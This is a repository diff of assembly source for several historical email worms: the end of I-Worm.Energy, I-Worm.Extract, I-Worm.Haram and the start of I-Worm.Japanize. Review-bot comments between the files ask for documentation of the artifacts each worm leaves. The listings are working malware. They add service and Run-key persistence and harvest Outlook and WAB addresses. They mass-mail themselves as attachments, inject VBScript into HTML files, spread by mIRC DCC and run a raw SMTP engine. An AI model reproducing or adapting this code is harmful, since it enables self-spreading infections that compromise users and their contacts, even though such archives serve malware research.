xor ecx,ecx
dec ecx
mov edx,ecx
NextByteCRC:
xor eax,eax
xor ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
NextBitCRC:
shr bx,1
rcr ax,1
jnc NoCRC
xor ax,08320h
xor bx,0EDB8h
NoCRC: dec dh
jnz NextBitCRC
xor ecx,eax
xor edx,ebx
dec edi
jne NextByteCRC
not edx
not ecx
pop ebx
mov eax,edx
rol eax,16
mov ax,cx
pop edx
pop ecx
SVCHandler:
ret
CRC32 EndP
ThreadEntry EndP
;log on to SCM
SVCRegister Proc
call _dt
dd offset e_name+5
dd offset service_start
dd 0
dd 0
_dt: call StartServiceCtrlDispatcherA ;start service dispatcher
dec eax
jne e_svc ;quit if error (no service
;requestz)
push 0
call ExitThread ;terminate this thread
service_start: ;execution goes here...
pushad
@SEH_SetupFrame <jmp end_seh> ;setup SEH frame
push offset SVCHandler
push offset e_name+5
call RegisterServiceCtrlHandlerA ;register service control
test eax,eax ;handler
je e_svc ;quit if error
push eax
call _ss
ss_: dd 10h or 20h
dd 4
dd 0
dd 0
dd 0
dd 0
dd 0
_ss: push eax
call SetServiceStatus ;set service status
call CloseServiceHandle ;close service handle
jmp e_svc ;and quit
SVCRegister EndP
;create item at SCM
SVCCreate Proc
push 000F0000h or 2
push 0
push 0
call OpenSCManagerA ;get handle to SCM
test eax,eax
je e_scm0
xchg eax,esi
; push 000F0000h or 1 or 2 or 4 or 8 or 10h or 20h or 40h or 80h or 100h
; push offset e_name+5
; push esi
; call OpenServiceA ;*** debug!
;
; push eax
; push eax
; call DeleteService ;*** debug!
; call CloseServiceHandle ;*** debug!
xor eax,eax
push eax
push eax
push eax
push eax
push eax
push offset sys_dir
push eax
push 2
push 10h
push 000F0000h or 1 or 2 or 4 or 8 or 10h or 20h or 40h or 80h or 100h
push offset e_name+5
push dword ptr [esp]
push esi
call CreateServiceA ;create service item
test eax,eax ;at SCM
je e_scm1 ;quit if error
push eax
call CloseServiceHandle ;close service handlez
e_scm1: push esi
call CloseServiceHandle ;...
e_scm0: ret ;and quit
SVCCreate EndP
signature db 0,'[I-Worm.Energy] by Benny/29A',0
;signature
proc_dump db PROC_COUNT dup (?) ;buffer for PIDz
worm_name db 256 dup (?) ;buffer for filename
tmp dd ? ;temporary variable
sys_dir db 256 dup (?) ;buffer for system dir.
arc_buffer db 256 dup (?) ;buffer for archive
;filename
virtual_end: ;...end of virus.
ends
end Start ;.
;bonus:
;here are lyrics from "Imagine", one very nice song from John Lennon.
; Imagine there's no heaven,
; It's easy if you try,
; No hell below us,
; Above us only sky,
; Imagine all the people
; living for today...
;
; Imagine there's no countries,
; It isn't hard to do,
; Nothing to kill or die for,
; No religion too,
; Imagine all the people
; living life in peace...
;
; You may say I'm a dreamer,
; but I'm not the only one,
; I hope some day you'll join us,
; And the world will live as one.
;
; Imagine no possesions,
; I wonder if you can,
; No need for greed or hunger,
; A brotherhood of man,
; Imagine all the people
; Sharing all the world...
;
; You may say I'm a dreamer,
; but I'm not the only one,
; I hope some day you'll join us,
; And the world will live as one.
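Review bot: Unlike the other sources in this commit, the header comment describes the execution scheme but gives no removal guidance, although the code leaves two persistent artefacts a reader needs to know about: the copy written into the system directory as `energy.exe` (built into `sys_dir` in `e_svc`; the header spells it `ENERGY.EXE`) and a service created by `CreateServiceA` in `SVCCreate` with start type 2, whose name is the string the `@pushsz` macro emits at `e_name` (`'EnErGy'`, referenced as `e_name+5`). Suggest adding a `to remove:` paragraph to the header that names the dropped file and the service, mirroring the `To delete the worm:` section in the Casper source in this same commit. The `*** debug!` lines that would have deleted the service are commented out, so nothing in the file itself documents the clean-up.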

480
Win32/I-Worm.Extract.asm Normal file

@ -0,0 +1,480 @@
comment #
Name : I-Worm.Extract
Author : PetiK
Date : February 3rd 2002 - February 4th 2002
Size : 5632
Action :
#
.586p
.model flat
.code
JUMPS
api macro a
extrn a:proc
call a
endm
include Useful.inc
include myinclude.inc
start_worm:
@pushsz "KERNEL32.DLL"
api GetModuleHandleA
xchg eax,ebx
kern macro x
push offset sz&x
push ebx
api GetProcAddress
mov _ptk&x,eax
endm
kern CloseHandle
kern CopyFileA
kern CreateDirectoryA
kern CreateFileA
kern CreateFileMappingA
kern DeleteFileA
kern GetDateFormatA
kern GetFileSize
kern GetModuleFileNameA
kern GetSystemDirectoryA
kern GetSystemTime
kern GetTimeFormatA
kern GetWindowsDirectoryA
kern lstrcat
kern lstrcmp
kern lstrcpy
kern lstrlen
kern MapViewOfFile
kern SetCurrentDirectoryA
kern Sleep
kern UnmapViewOfFile
kern WinExec
kern WriteFile
kern WriteProfileStringA
kern WritePrivateProfileStringA
push 50
mov esi,offset orig_worm
push esi
push 0
call _ptkGetModuleFileNameA
push 50
push offset verif_worm
call _ptkGetSystemDirectoryA
@pushsz "\UPDATEW32.EXE"
push offset verif_worm
call _ptklstrcat
push esi
push offset verif_worm
call _ptklstrcmp
test eax,eax
jz continue_worm
mov edi,offset copy_worm
push edi
push 50
push edi
call _ptkGetSystemDirectoryA
add edi,eax
mov eax,"dpU\"
stosd
mov eax,"Weta"
stosd
mov eax,"e.23"
stosd
mov eax,"ex"
stosd
pop edi
copy_w: push 0
push edi
push esi
call _ptkCopyFileA
run_w: push edi
@pushsz "RUN"
@pushsz "WINDOWS"
call _ptkWriteProfileStringA
call CreateDate
push 50
push offset realname
push offset orig_worm
api GetFileTitleA
@pushsz " - "
push offset date
call _ptklstrcat
push offset realname
push offset date
call _ptklstrcat
f_mess: push 10h
push offset date
call @mess
db "Cannot Open this File !",CRLF,CRLF
db "If you downloaded this file, try downloading again.",0
@mess:
push 0
api MessageBoxA
jmp end_worm
continue_worm:
push 50
push offset vbsfile
call _ptkGetWindowsDirectoryA
@pushsz "\ExtractVbs.vbs"
push offset vbsfile
call _ptklstrcat
push 0
push 20h
push 2
push 0
push 1
push 40000000h
push offset vbsfile
call _ptkCreateFileA
xchg eax,ebx
push 0
push offset octets
push e_vbs - s_vbs
push offset s_vbs
push ebx
call _ptkWriteFile
push ebx
call _ptkCloseHandle
push offset vbsfile
push offset vbsexec
call _ptklstrcpy
push 4
push offset execcontrol
call _ptkWinExec
push 5000
call _ptkSleep
push offset vbsfile
call _ptkDeleteFileA
payload:
push offset Systime
call _ptkGetSystemTime
cmp [Systime.wDay],29
jne end_pay
push 40h
@pushsz "I-Worm.Extract"
call e_mess
db "Hi man, you received my worm !",CRLF
db "Don't panic, it doesn't format your computer",CRLF,CRLF
db 9,"Bye and Have a Nice Day.",0
e_mess:
push 0
api MessageBoxA
end_pay:
sh_gsf: push 0
push 5
push offset progra
push 0
api SHGetSpecialFolderPathA
push offset progra
call _ptkSetCurrentDirectoryA
@pushsz "Update Windows 32bits"
call _ptkCreateDirectoryA
@pushsz "\Update Windows 32bits"
push offset progra
call _ptklstrcat
push offset progra
call _ptkSetCurrentDirectoryA
push 0
@pushsz "MAJ.exe"
push offset orig_worm
call _ptkCopyFileA
verif_inet:
push 0
push offset inet
api InternetGetConnectedState
dec eax
jnz verif_inet
push 50
push offset winpath
call _ptkGetWindowsDirectoryA
push offset winpath
call _ptkSetCurrentDirectoryA
spread: pushad
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
@pushsz "Outlook_Addr.txt"
call _ptkCreateFileA
inc eax
je end_spread
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 2
push eax
push ebx
call _ptkCreateFileMappingA
test eax,eax
je end_s1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 4
push ebp
call _ptkMapViewOfFile
test eax,eax
je end_s2
xchg eax,esi
push 0
push ebx
call _ptkGetFileSize
cmp eax,4
jbe end_s3
scan_mail:
xor edx,edx
mov edi,offset mail_addr
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,";"
je end_m
cmp al,"#"
je f_mail
cmp al,'@'
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
end_m: xor al,al
stosb
pop edi
test edx,edx
je scan_mail
call send_mail
jmp scan_mail
f_mail:
end_s3: push esi
call _ptkUnmapViewOfFile
end_s2: push ebp
call _ptkCloseHandle
end_s1: push ebx
call _ptkCloseHandle
end_spread: popad
end_worm:
push 0
api ExitProcess
send_mail:
call CreateDate
call CreateTime
@pushsz "C:\liste.ini"
push offset mail_addr
push offset time
push offset date
call _ptkWritePrivateProfileStringA
xor eax,eax
push eax
push eax
push offset Message
push eax
push [sess]
api MAPISendMail
ret
CreateDate Proc
pushad
mov edi,offset date
push 32
push edi
@pushsz "dddd, dd MMMM yyyy"
push 0
push 0
push 9
call _ptkGetDateFormatA
popad
ret
CreateDate EndP
CreateTime Proc
pushad
mov edi,offset time
push 32
push edi
@pushsz "HH:mm:ss"
push 0
push 0
push 9
call _ptkGetTimeFormatA
popad
ret
CreateTime EndP
.data
copy_worm db 50 dup (0)
orig_worm db 50 dup (0)
verif_worm db 50 dup (0)
vbsfile db 50 dup (0)
winpath db 50 dup (0)
progra db 50 dup (0)
mail_addr db 128 dup (?)
realname db 50 dup (0)
date db 30 dup (?)
time db 9 dup (?)
octets dd ?
inet dd 0
sess dd 0
subject db "Re: Check This...",0
body db "Hi",CRLF
db "This is the file you ask for. Open quickly ! It's very important",CRLF,CRLF
db 9,"Best Regards",CRLF,CRLF,CRLF
db "Salut,",CRLF
db "Voici le fichier que tu cherches. Ouvre vite ! C'est trčs important",CRLF,CRLF
db 9,"Mes sincčres salutations",0
filename db "important.exe",0
Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach
MsgFrom dd ?
dd ?
dd ?
dd ?
dd ?
dd ?
MsgTo dd ?
dd 1
dd offset mail_addr
dd offset mail_addr
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset orig_worm
dd offset filename
dd ?
szCloseHandle db "CloseHandle",0
szCopyFileA db "CopyFileA",0
szCreateDirectoryA db "CreateDirectoryA",0
szCreateFileA db "CreateFileA",0
szCreateFileMappingA db "CreateFileMappingA",0
szDeleteFileA db "DeleteFileA",0
szGetDateFormatA db "GetDateFormatA",0
szGetFileSize db "GetFileSize",0
szGetModuleFileNameA db "GetModuleFileNameA",0
szGetSystemDirectoryA db "GetSystemDirectoryA",0
szGetSystemTime db "GetSystemTime",0
szGetTimeFormatA db "GetTimeFormatA",0
szGetWindowsDirectoryA db "GetWindowsDirectoryA",0
szlstrcat db "lstrcat",0
szlstrcmp db "lstrcmp",0
szlstrcpy db "lstrcpy",0
szlstrlen db "lstrlen",0
szMapViewOfFile db "MapViewOfFile",0
szSetCurrentDirectoryA db "SetCurrentDirectoryA",0
szSleep db "Sleep",0
szUnmapViewOfFile db "UnmapViewOfFile",0
szWinExec db "WinExec",0
szWriteFile db "WriteFile",0
szWritePrivateProfileStringA db "WritePrivateProfileStringA",0
szWriteProfileStringA db "WriteProfileStringA",0
_ptkCloseHandle dd ?
_ptkCopyFileA dd ?
_ptkCreateDirectoryA dd ?
_ptkCreateFileA dd ?
_ptkCreateFileMappingA dd ?
_ptkDeleteFileA dd ?
_ptkGetDateFormatA dd ?
_ptkGetFileSize dd ?
_ptkGetModuleFileNameA dd ?
_ptkGetSystemDirectoryA dd ?
_ptkGetSystemTime dd ?
_ptkGetTimeFormatA dd ?
_ptkGetWindowsDirectoryA dd ?
_ptklstrcat dd ?
_ptklstrcmp dd ?
_ptklstrcpy dd ?
_ptklstrlen dd ?
_ptkMapViewOfFile dd ?
_ptkSetCurrentDirectoryA dd ?
_ptkSleep dd ?
_ptkUnmapViewOfFile dd ?
_ptkWinExec dd ?
_ptkWriteFile dd ?
_ptkWriteProfileStringA dd ?
_ptkWritePrivateProfileStringA dd ?
s_vbs: db 'On Error Resume Next',CRLF
db 'Set f=CreateObject("Scripting.FileSystemObject")',CRLF
db 'Set win=f.GetSpecialFolder(0)',CRLF
db 'Set c=f.CreateTextFile(win&"\Outlook_Addr.txt")',CRLF
db 'c.Close',CRLF
db 'Set out=CreateObject("Outlook.Application")',CRLF
db 'Set mapi=out.GetNameSpace("MAPI")',CRLF
db 'adr="extractcounter@multimania.com"',CRLF
db 'For Each mail in mapi.AddressLists',CRLF
db 'If mail.AddressEntries.Count <> 0 Then',CRLF
db 'For O=1 To mail.AddressEntries.Count',CRLF
db 'adr=adr &";"& mail.AddressEntries(O).Address',CRLF
db 'Next',CRLF
db 'End If',CRLF
db 'Next',CRLF
db 'adr=adr &";#"',CRLF,CRLF
db 'Set c=f.OpenTextFile(win&"\Outlook_Addr.txt",2)',CRLF
db 'c.WriteLine adr',CRLF
db 'c.Close',CRLF
e_vbs:
execcontrol db "wscript "
vbsexec db 50 dup (0)
db "",0
end start_worm
end

592
Win32/I-Worm.Haram.asm Normal file

@ -0,0 +1,592 @@
comment *
Name : I-Worm.Haram
Author : PetiK
Language : win32asm
Date : May 13th 2002 - June 1st 2002
Size : 5192 bytes (compressed with Petite Tool)
Comments : - Copy to %sysdir%\FunnyGame.exe
- Search all doc files in "Personal" folder and create a new virus html file:
example : document.doc -> document.htm
1) 2)
1) Good DOC file
2) Good HTM virus (1571 bytes)
- Put the name of all active process and add .htm:
example : process.exe -> process.exe.htm
3) 4)
3) Real name of active process
4) Real name of the HTM virus (in "C:\backup" folder for Win ME/2k/XP)
- Create a random name file in StarUp folder to spread with Outlook
- On the 10th, payload : open and close CD door and display a messagebox in loop
*
.586p
.model flat
.code
JUMPS
include win32api.inc
LF equ 10
CR equ 13
CRLF equ <13,10>
@pushsz macro msg2psh, empty
local next_instr
ifnb <empty>
%out too much arguments in macro '@pushsz'
.err
endif
call next_instr
db msg2psh,0
next_instr:
endm
@endsz macro
local nxtchr
nxtchr: lodsb
test al,al
jnz nxtchr
endm
api macro a
extrn a:proc
call a
endm
WIN32_FIND_DATA struct
dwFileAttributes dd 0
ftCreationTime dd ?,?
ftLastAccessTime dd ?,?
ftLastWriteTime dd ?,?
nFileSizeHigh dd 0
nFileSizeLow dd 0
dwReserved0 dd 0,0
cFileName db 260 dup(0)
cAlternateFileName db 14 dup(0)
db 2 dup (0)
WIN32_FIND_DATA ends
PROCESSENTRY32 STRUCT
dwSize DWORD ?
cntUsage DWORD ?
th32ProcessID DWORD ?
th32DefaultHeapID DWORD ?
th32ModuleID DWORD ?
cntThreads DWORD ?
th32ParentProcessID DWORD ?
pcPriClassBase DWORD ?
dwFlags DWORD ?
szExeFile db 260 dup(?)
PROCESSENTRY32 ENDS
start: pushad
@SEH_SetupFrame <jmp end_worm>
hide_the_worm:
call hide_worm
get_name:
push 50
mov esi,offset orgwrm
push esi
push 0
api GetModuleFileNameA
get_copy_name:
mov edi,offset cpywrm
push edi
push 50
push edi
api GetSystemDirectoryA
add edi,eax
mov eax,'nuF\'
stosd
mov eax,'aGyn'
stosd
mov eax,'e.em'
stosd
mov eax,'ex'
stosd
pop edi
copy_worm:
push 1
push edi
push esi
api CopyFileA
test eax,eax
je ok_copy
push 50
push edi
push 1
@pushsz "Haram"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
api SHSetValueA
push 50
push offset msgwrm
push esi
api GetFileTitleA
push 10h
push offset msgwrm
@pushsz "ERROR : this file is not a valid Win32 file."
push 0
api MessageBoxA
ok_copy:
call inf_doc_personal
get_startup_path:
push 0
push 7
push offset startup
push 0
api SHGetSpecialFolderPathA
push offset startup
api SetCurrentDirectoryA
call cr_vbsname
mov edi,offset vbsname
push 0
push 1
push 2
push 0
push 1
push 40000000h
push edi
api CreateFileA
mov ebp,eax
push 0
push offset byte_write
push e_vbs - s_vbs
push offset s_vbs
push ebp
api WriteFile
push ebp
api CloseHandle
payload:
mov eax,offset sysTime
push eax
api GetSystemTime
lea eax,sysTime
cmp word ptr [eax+6],10
jne end_payload
xor eax,eax
push eax
push eax
push eax
@pushsz "set CDAudio door open"
api mciSendStringA
push 500
api Sleep
xor eax,eax
push eax
push eax
push eax
@pushsz "set CDAudio door closed"
api mciSendStringA
push 40h
@pushsz "I-Worm.Haram"
@pushsz "Coded by PetiK - ©2002 - France"
push 0
api MessageBoxA
api GetTickCount
push 10000
pop ecx
xor edx,edx
div ecx
inc edx
mov ecx,edx
push ecx
api Sleep
jmp payload
end_payload:
call inf_process
end_worm:
@SEH_RemoveFrame
popad
push 0
api ExitProcess
hide_worm Proc
pushad
@pushsz "KERNEL32.DLL"
api GetModuleHandleA
xchg eax,ecx
jecxz end_hide_worm
@pushsz "RegisterServiceProcess" ; Registered as Service Process
push ecx
api GetProcAddress
xchg eax,ecx
jecxz end_hide_worm
push 1
push 0
call ecx
end_hide_worm:
popad
ret
hide_worm EndP
Spread_Mirc Proc
push offset cpywrm
push offset mirc_exe
api lstrcpy
call @mirc
db "C:\mirc\script.ini",0
db "C:\mirc32\script.ini",0 ; spread with mIRC. Thanx to Microsoft.
db "C:\progra~1\mirc\script.ini",0
db "C:\progra~1\mirc32\script.ini",0
@mirc:
pop esi
push 4
pop ecx
mirc_loop:
push ecx
push 0
push 80h
push 2
push 0
push 1
push 40000000h
push esi
api CreateFileA
mov ebp,eax
push 0
push offset byte_write
@tmp_mirc:
push e_mirc - s_mirc
push offset s_mirc
push ebp
api WriteFile
push ebp
api CloseHandle
@endsz
pop ecx
loop mirc_loop
end_spread_mirc:
ret
Spread_Mirc EndP
inf_doc_personal Proc
pushad
get_personal_folder:
push 0
push 5
push offset personal
push 0
api SHGetSpecialFolderPathA
push offset personal
api SetCurrentDirectoryA
fff_doc:
push offset ffile
@pushsz "*.doc"
api FindFirstFileA
inc eax
je end_f_doc
dec eax
mov [hfind],eax
cr_file:
push offset ffile.cFileName
push offset new_file
api lstrcpy
mov esi,offset new_file
push esi
api lstrlen
add esi,eax
sub esi,4 ; to become \SYSTEM\Wsock32
mov [esi],"mth."
lodsd
push 0
push 1
push 2
push 0
push 1
push 40000000h
push offset new_file
api CreateFileA
mov ebp,eax
push 0
push offset byte_write
push e_htm - s_htm
push offset s_htm
push ebp
api WriteFile
push ebp
api CloseHandle
fnf_doc:
push offset ffile
push [hfind]
api FindNextFileA
test eax,eax
jne cr_file
push [hfind]
api FindClose
end_f_doc:
popad
ret
inf_doc_personal EndP
inf_process Proc
popad
create_folder:
push 0
@pushsz "C:\backup"
api CreateDirectoryA
@pushsz "C:\backup"
api SetCurrentDirectoryA
enum_process:
push 0
push 2
api CreateToolhelp32Snapshot
mov lSnapshot,eax
inc eax
je end_inf_process
lea eax,uProcess
mov [eax.dwSize], SIZE PROCESSENTRY32
lea eax,uProcess
push eax
push lSnapshot
api Process32First
check_process:
test eax,eax
jz end_process
push ecx
mov eax,ProcessID
push offset uProcess
cmp eax,[uProcess.th32ProcessID]
je NextProcess
lea ebx,[uProcess.szExeFile]
push ebx
push offset new_name
api lstrcpy
mov edi,offset new_name
push edi
api lstrlen
add edi,eax
mov eax,"mth."
stosd
xor eax,eax
stosd
push offset new_name
@pushsz "System.htm"
api lstrcmp
test eax,eax
jz NextProcess
push 0
push 1
push 2
push 0
push 1
push 40000000h
push offset new_name
api CreateFileA
mov ebp,eax
push 0
push offset byte_write
push e_htm - s_htm
push offset s_htm
push ebp
api WriteFile
push ebp
api CloseHandle
NextProcess:
push offset uProcess
push lSnapshot
api Process32Next
jmp check_process
end_process:
push lSnapshot
api CloseHandle
end_inf_process:
pushad
ret
inf_process EndP
cr_vbsname Proc
mov edi,offset vbsname
; api GetTickCount
push 10
pop ecx
; xor edx,edx
; div ecx
; inc edx
; mov ecx,edx
name_g:
push ecx
api GetTickCount
push '9'-'0'
pop ecx
xor edx,edx
div ecx
xchg eax,edx
add al,'0'
stosb
api GetTickCount
push 100
pop ecx
xor edx,edx
div ecx
push edx
api Sleep
pop ecx
loop name_g
mov eax,"sbv."
stosd
ret
cr_vbsname EndP
.data
ffile WIN32_FIND_DATA <?>
sysTime db 16 dup(0)
uProcess PROCESSENTRY32 <?>
ProcessID dd ?
lSnapshot dd ?
new_name db 100 dup (?)
orgwrm db 50 dup (0)
cpywrm db 50 dup (0)
msgwrm db 50 dup (0)
startup db 70 dup (0)
personal db 70 dup (0)
new_file db 90 dup (0)
vbsname db 20 dup (0)
byte_write dd ?
hfind dd ?
s_mirc: db "[script]",CRLF
db ";Don't edit this file.",CRLF,CRLF
db "n0=on 1:JOIN:{",CRLF
db "n1= /if ( $nick == $me ) { halt }",CRLF
db "n2= /.dcc send $nick "
mirc_exe db 50 dup (?)
db CRLF,"n3=}",0
e_mirc:
s_htm: db '<haram>',CRLF
db '<html><head><title>Windows Media Player</title></head><body>',CRLF
db '<script language=VBScript>',CRLF
db 'On Error Resume Next',CRLF
db 'MsgBox "Please accept the ActiveX",vbinformation,"Internet Explorer"',CRLF
db 'Set upfkupfk=CreateObject("Scripting.FileSystemObject")',CRLF
db 'Set kupfkvqg=CreateObject("WScript.Shell")',CRLF
db 'If err.number=429 Then',CRLF
db 'kupfkvqg.Run javascript:location.reload()',CRLF
db 'Else',CRLF,CRLF
db 'glvqglvb(upfkupfk.GetSpecialFolder(0))',CRLF
db 'glvqglvb(upfkupfk.GetSpecialFolder(1))',CRLF
db 'glvqglvb(kupfkvqg.SpecialFolders("MyDocuments"))',CRLF
db 'glvqglvb(kupfkvqg.SpecialFolders("Desktop"))',CRLF
db 'glvqglvb(kupfkvqg.SpecialFolders("Favorites"))',CRLF
db 'glvqglvb(kupfkvqg.SpecialFolders("Fonts"))',CRLF
db 'End If',CRLF,CRLF
db 'Function glvqglvb(dir)',CRLF
db 'If upfkupfk.FolderExists(dir) Then',CRLF
db ' Set bbbbbbbb=upfkupfk.GetFolder(dir)',CRLF
db ' Set bbblvqgl=bbbbbbbb.Files',CRLF
db ' For each lvqgvqgl in bbblvqgl',CRLF
db ' lvqglvqr=lcase(upfkupfk.GetExtensionName(lvqgvqgl.Name))',CRLF
db ' If lvqglvqr="htm" or lvqglvqr="html" Then',CRLF
db ' Set rhmwrrhm=upfkupfk.OpenTextFile(lvqgvqgl.path,1 ,False)',CRLF
db ' if rhmwrrhm.ReadLine <> "<haram>" Then',CRLF
db ' rhmwrrhm.Close()',CRLF
db ' Set rhmwrrhm=upfkupfk.OpenTextFile(lvqgvqgl.path,1 ,False)',CRLF
db ' htmorg=rhmwrrhm.ReadAll()',CRLF
db ' rhmwrrhm.Close()',CRLF
db ' Set mwrrhmwr=document.body.createTextRange',CRLF
db ' Set rhmwrrhm=upfkupfk.CreateTextFile(lvqgvqgl.path, True, False)',CRLF
db ' rhmwrrhm.WriteLine "<haram>"',CRLF
db ' rhmwrrhm.Write(htmorg)',CRLF
db ' rhmwrrhm.WriteLine mwrrhmwr.htmltext',CRLF
db ' rhmwrrhm.Close()',CRLF
db ' Else',CRLF
db ' rhmwrrhm.Close()',CRLF
db ' End If',CRLF
db ' End If',CRLF
db ' Next',CRLF
db 'End If',CRLF
db 'End Function',CRLF
db '</script></body></html>',0
e_htm:
s_vbs: db 'On Error Resume Next',CRLF
db 'Set terqne = CreateObject("Scripting.FileSystemObject")',CRLF
db 'Set qumhzh = CreateObject("WScript.Shell")',CRLF
db 'Set sys = terqne.GetSpecialFolder(1)',CRLF
db 'copyname = sys&"\FunnyGame.exe"',CRLF
db 'Set htgx = CreateObject("Outlook.Application")',CRLF
db 'Set ofcc = htgx.GetNameSpace("MAPI")',CRLF
db 'For each c In ofcc.AddressLists',CRLF
db 'If c.AddressEntries.Count <> 0 Then',CRLF
db 'For d = 1 To c.AddressEntries.Count',CRLF
db 'Set etldb = htgx.CreateItem(0)',CRLF
db 'etldb.To = c.AddressEntries(d).Address',CRLF
db 'etldb.Subject = "New game from the net for you " & c.AddressEntries(d).Name',CRLF
db 'etldb.Body = "Play at this funny game. It''s very cool !"',CRLF
db 'etldb.Attachments.Add(copyname)',CRLF
db 'etldb.DeleteAfterSubmit = True',CRLF
db 'If etldb.To <> "" Then',CRLF
db 'etldb.Send',CRLF
db 'End If',CRLF
db 'Next',CRLF
db 'End If',CRLF
db 'Next',0
e_vbs:
ends
end start
*************************************************************************
@tasm32 /M /ML haram.asm
@tlink32 -Tpe -aa -c -x haram.obj,,,import32,haram.def
rem pause
rem upx -9 haram.exe
@del *.obj
rem pause
*************************************************************************
IMPORTS
SHLWAPI.SHSetValueA
SHELL32.SHGetSpecialFolderPathA
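Review bot: The `comment *` header at the top of this file lists the drop path and the HTM/VBS behaviour but not the persistence and host artifacts the code itself writes, which is what an analyst reading this archive needs first: the `Run` value named `Haram` set under `80000002h` (HKLM) via `SHSetValueA` right after the copy in `copy_worm`, the `RegisterServiceProcess` call in `hide_worm`, the `C:\backup` directory created in `inf_process`, and the `<haram>` first-line marker that the HTM payload uses as its already-infected test. A single header line such as `; Artifacts: HKLM\...\CurrentVersion\Run\Haram, %sysdir%\FunnyGame.exe, C:\backup\*.exe.htm, "<haram>" first line in touched .htm, random-digit .vbs in Startup` would make these detection handles discoverable without tracing the listing. `Spread_Mirc` and its four `script.ini` paths appear not to be called from `start` or any other routine in this section, so the header should also state that the mIRC routine is dead code in this revision rather than leave that to be inferred.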

857
Win32/I-Worm.Japanize.asm Normal file

@ -0,0 +1,857 @@
;;; XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
;;; I-Worm.Japanize
;;; XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
;;;
;;;
;;; This has some bugs.
;;;
;;; Here TrendMicro description:
;;; ******************************************************************
;;; http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=WORM_FBOUND.B&VSect=T
;;; Details:
;;;The details of the email this worm arrives with may be as follows:
;;;
;;;To: <recipient>
;;;Subject: <"Important" or random Japanese text(applicable on Japanese supported platforms)>
;;;Message Body: <blank>
;;;Attachment: patch.exe
;;;
;;;It uses its own SMTP engine and uses the following registry key to retrieve the default SMTP server of the infected system:
;;;HKEY_CURRENT_USER\Software\Microsoft\
;;;Internet Account Manager\Accounts\00000001
;;;
;;;It uses the following registry key to retrieve email addresses from the infected user's Windows Address Book (WAB):
;;;HKEY_CURRENT_USER\Software\Microsoft\WAB\
;;;WAB4Wab File Name = “<pathname of WAB file>”
;;;
;;;The email arrives with the attachment PATCH.EXE. If the email address of its target ;;;user ends with the extension .jp, the worm randomly selects a phrase, from a list of 17 possible Japanese phrases below, and uses one as the subject of the email:
;;;
;;;
;;;The English translation for the above Japanese text are as follows:
;;;Re: the issue that you mentioned
;;;Re: important
;;;Re: long time no see
;;;Re: top secret
;;;Re: Hello
;;;Re: important information
;;;Re: data
;;;the issue that you mentioned
;;;important
;;;long time no see
;;;top secret
;;;hello
;;;important information
;;;data
;;;frog
;;;shit
;;;shit
;;;
;;;Otherwise, it uses the subject “Important."
;;;
;;;This non-destructive worm does not drop files or create any registry entries. Its propagation depends on the execution of the file attachment in the email.
;;;
;;;The following text strings are found in the worm body:
;;;
;;;XXXXXXXXXXXXXXXXXXXXXXX
;;;XXXXX I-Worm.Japanize XXXXX
;;;XXXXXXXXXXXXXXXXXXXXXXX
;;;
;;;
.586p
.model flat
locals
jumps
;;; some lazy shit
callW macro @@@x
extrn @@@x:proc
call @@@x
endm
ofs equ offset
dwo equ dword ptr
wo equ word ptr
by equ byte ptr
HKEY_CURRENT_USER EQU 80000001h
CRLF equ <13,10>
rdtsc equ <dw 310fh>
AF_INET equ 2
SOCK_STREAM equ 1
FILE_ATTRIBUTE_NORMAL EQU 00000080h
GENERIC_READ EQU 80000000h
GENERIC_WRITE EQU 40000000h
PAGE_READONLY EQU 00000002h
PAGE_READWRITE EQU 00000004h
FILE_MAP_READ EQU 00000004h
OPEN_EXISTING EQU 00000003h
GHND EQU 042h
FILE_SHARE_READ EQU 00000001h
FILE_SHARE_WRITE EQU 00000002h
;;; ----------------------------------------------------------------
.data
hReg dd ?; registry handle
str_SMInternetAccountManager db 'Software\Microsoft\Internet Account Manager',0
str_SMIAccounts db 'Software\Microsoft\Internet Account Manager\Accounts\'
AccountIdx db 9 dup(?); account index
bufsiz_accountidx dd 9; size
str_DMA db 'Default Mail Account',0
str_SMTPNAME db 'SMTP Server',0
str_SMTPEmailAddr db 'SMTP Email Address',0
str_SMWab4 db 'Software\Microsoft\WAB\WAB4\Wab File Name',0
SMTP_Server db 50 dup(?) ; default smtp server
bufsiz_SMTPSERVER dd 50
morons_Mailaddr db 256 dup(?) ; mail address of moron :)
bufsiz_morons_mailaddr dd 256
wab4_path db 260 dup(?); wab file path
bufsiz_wab4_path dd 260
buffer db 1000 dup(?)
hwab4file dd ? ; wab4 file handle
hwab4map dd ? ;
hwab4mapview dd ? ;
myfilename db 260 dup(?) ; handle of myself
hmyfile dd ?
fsize dd ? ; file size
hmemout0 dd ?
ptr_myself dd ?
hmemout dd ? ; globalalloc
ptr_base64buf dd ? ; globallock
target_mailaddr db 48h dup(?) ;
sockaddr_in label byte ;
sin_family dw ?
sin_port dw ?
sin_addr dd ?
sin_zero db 8 dup(?)
len_sockaddr_in = $ - ofs sockaddr_in
sock dd ? ; socket descriptor
recv_buffer db 1024 dup(?) ; recv buffer
jflag dd 0 ; japanese or not
smtp_HELO db 'HELO localhost',CRLF
len_smtp_HELO = $ - ofs smtp_HELO
smtp_MAIL_FROM db 'MAIL FROM: '
len_smtp_MAIL_FROM = $ - ofs smtp_MAIL_FROM
;crlf
smtp_RCPT_TO db 'RCPT TO: '
len_smtp_RCPT_TO = $ - ofs smtp_RCPT_TO
;crlf
smtp_DATA db 'DATA',CRLF
len_smtp_DATA = $ - ofs smtp_DATA
smtp_BODY_FROM db 'FROM: '
len_smtp_BODY_FROM = $ - ofs smtp_BODY_FROM
